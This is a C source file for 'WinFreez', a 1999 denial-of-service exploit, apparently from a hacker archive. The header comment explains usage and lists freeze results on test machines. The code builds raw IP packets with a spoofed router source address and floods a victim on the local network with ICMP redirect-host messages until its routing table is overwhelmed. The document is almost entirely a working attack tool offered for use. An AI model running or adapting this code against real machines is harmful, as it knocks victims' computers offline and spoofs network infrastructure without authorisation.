/*
 WinFreez.c by Delmore <delmore@moscowmail.com>
 
 ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box
 in LAN.
 
 Usage: winfreez sendtoip sendfromip time
 where <sendtoip> is victim host, <sendfromip> is router
 for victim host, <time> is time in seconds to freeze victim.
 
 Note:
 I've written small exploit for freeze win9x/nt boxes in LAN.
 Proggy initiates ICMP/Redirect-host messages storm from router
 (use router ip). Windows will receive redirect-host messages
 and change own route table, therefore it will be frozen
 or slowly working during this time.
 
 On victim machine route table changes viewing with:
 ROUTE PRINT
 command in ms-dos box.
 
 Exploit show different result for different system configuration.
 
 System results:
 
 p200/16ram/win95osr2 is slowly execute application
 after 20 seconds of storm.
 
 p233/96ram/nt4-sp4 is slowly working after 30
 seconds of storm.
 
 p2-266/64ram/win95 working slowly and can't normal execute
 application.
 
 
 Compiled on RedHat Linux 5, Kernel 2.0.35 (x86)
 gcc ./winfreez.c -o winfreez
 
 --- for Slackware Linux, Kernel 2.0.30
 If you can't compile due to ip_sum not defined errors,
 replace (line 207):
  ip->ip_sum = 0;
 to line:
  ip->ip_csum = 0;
 ---
 
 Soldiers Of Satan group
 Russia, Moscow State University, 05 march 1999
 http://sos.nanko.ru
 
 Thanx to Mark Henderson.
 
 */

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

/*
 * Structure of an icmp header (from sparc header).
 */

struct icmp
  {
    u_char icmp_type; /* type of message, see below */
    u_char icmp_code; /* type sub code */
    u_short icmp_cksum; /* ones complement cksum of struct */

    union {
        u_char ih_pptr; /* ICMP_PARAMPROB */
        struct in_addr ih_gwaddr; /* ICMP_REDIRECT */
        struct ih_idseq
          {
            n_short icd_id;
            n_short icd_seq;
          }
        ih_idseq;

        int ih_void;
      } icmp_hun;

#define icmp_pptr icmp_hun.ih_pptr
#define icmp_gwaddr icmp_hun.ih_gwaddr
#define icmp_id icmp_hun.ih_idseq.icd_id
#define icmp_seq icmp_hun.ih_idseq.icd_seq
#define icmp_void icmp_hun.ih_void

    union {
        struct id_ts
          {
            n_time its_otime;
            n_time its_rtime;
            n_time its_ttime;
          }
        id_ts;

        struct id_ip
          {
            struct ip idi_ip;
            /* options and then 64 bits of data */
          }
        id_ip;

        u_long id_mask;
        char id_data[1];
      } icmp_dun;

#define icmp_otime icmp_dun.id_ts.its_otime
#define icmp_rtime icmp_dun.id_ts.its_rtime
#define icmp_ttime icmp_dun.id_ts.its_ttime
#define icmp_ip icmp_dun.id_ip.idi_ip
#define icmp_mask icmp_dun.id_mask
#define icmp_data icmp_dun.id_data

  };


u_short in_cksum (u_short *addr, int len);
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s );


void main (int argc, char **argv)
{
  time_t wtime;
  char *sendtoip, *sendfromip;
  int s, on;

  if (argc != 4)
    {
      fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]);
      exit (1);
    }

  sendtoip = (char *)malloc(strlen(argv[1]) + 1);
  strcpy(sendtoip, argv[1]);

  sendfromip = (char *)malloc(strlen(argv[2]) + 1);
  strcpy(sendfromip, argv[2]);

  wtime = atol(argv[3]);

  if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
      fprintf (stderr, "socket creation error\n" );
      exit (1);
    }

#ifdef IP_HDRINCL
  if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0)
    {
      fprintf (stderr, "sockopt IP_HDRINCL error\n" );
      exit (1);
    }
#endif

  printf("winfreez by Delmore, <delmore@moscowmail.com>\n");
  printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n");
  printf("sendto = %s\n", sendtoip);
  printf("sendfrom = %s\n", sendfromip);
  printf("time = %i s\n", wtime);

  attack( sendtoip, sendfromip, wtime, s );

  free( (void *) sendtoip );
  free( (void *) sendfromip );
}


void attack( char *sendtoip, char *sendfromip, time_t wtime, int s )
{
  time_t curtime, endtime;
  int i1, i2, i3, i4;
  char redir[21];
  char buf[100];
  struct ip *ip = (struct ip *) buf;
  struct icmp *icmp = (struct icmp *) (ip + 1);
  struct hostent *hp;
  struct sockaddr_in dst;

  if(wtime==0) return;

  if ((hp = gethostbyname (sendtoip)) == NULL)
    if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1)
      {
        fprintf (stderr, "%s: unknown sendto\n", sendtoip);
        exit (1);
      }

  if ((hp = gethostbyname (sendfromip)) == NULL)
    if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1)
      {
        fprintf (stderr, "%s: unknown sendfrom\n", sendfromip);
        exit (1);
      }

  endtime = time(NULL) + wtime;

  srand((unsigned int) endtime);

  do
    {
      bzero (buf, sizeof buf);

      /* sendto/gateway */
      hp = gethostbyname (sendtoip);
      bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
      bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length);

      /* sendfrom */
      hp = gethostbyname (sendfromip);
      bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);

      /* generate redirect*/
      i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0));
      i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
      i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
      i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));

      bzero (redir, sizeof redir);
      sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 );

      hp = gethostbyname (redir);
      bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length);

      ip->ip_v = 4;
      ip->ip_hl = sizeof *ip >> 2;
      ip->ip_tos = 0;
      ip->ip_len = htons (sizeof buf);
      ip->ip_id = htons (4321);
      ip->ip_off = 0;
      ip->ip_ttl = 255;
      ip->ip_p = 1;
      ip->ip_sum = 0;               /* kernel fills this in */

      bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof(ip->ip_dst.s_addr));
      icmp->icmp_ip.ip_v = 4;
      icmp->icmp_ip.ip_hl = sizeof *ip >> 2;
      icmp->icmp_ip.ip_tos = 0;
      icmp->icmp_ip.ip_len = htons (100);   /* doesn't matter much */
      icmp->icmp_ip.ip_id = htons (3722);
      icmp->icmp_ip.ip_off = 0;
      icmp->icmp_ip.ip_ttl = 254;
      icmp->icmp_ip.ip_p = 1;
      icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip);

      dst.sin_addr = ip->ip_dst;
      dst.sin_family = AF_INET;

      icmp->icmp_type = ICMP_REDIRECT;
      icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */
      icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof(*ip));

      if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) < 0 )
        {
          fprintf (stderr, "sendto error\n");
          exit (1);
        }

    }
  while (time(NULL)!=endtime);
}

/*
 * in_cksum -- Checksum routine for Internet Protocol family headers (C
 * Version) - code from 4.4 BSD
 */
u_short in_cksum (u_short *addr, int len)
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  /*
   * Our algorithm is simple, using a 32 bit accumulator (sum), we add
   * sequential 16 bit words to it, and at the end, fold back all the
   * carry bits from the top 16 bits into the lower 16 bits.
   */
  while (nleft > 1)
    {
      sum += *w++;
      nleft -= 2;
    }

  /* mop up an odd byte, if necessary */
  if (nleft == 1)
    {
      *(u_char *) (&answer) = *(u_char *) w;
      sum += answer;
    }
  /* add back carry outs from top 16 bits to low 16 bits */
  sum = (sum >> 16) + (sum & 0xffff);   /* add hi 16 to low 16 */
  sum += (sum >> 16);           /* add carry */
  answer = ~sum;                /* truncate to 16 bits */
  return (answer);
}
/*                    www.hack.co.za              [2000]*/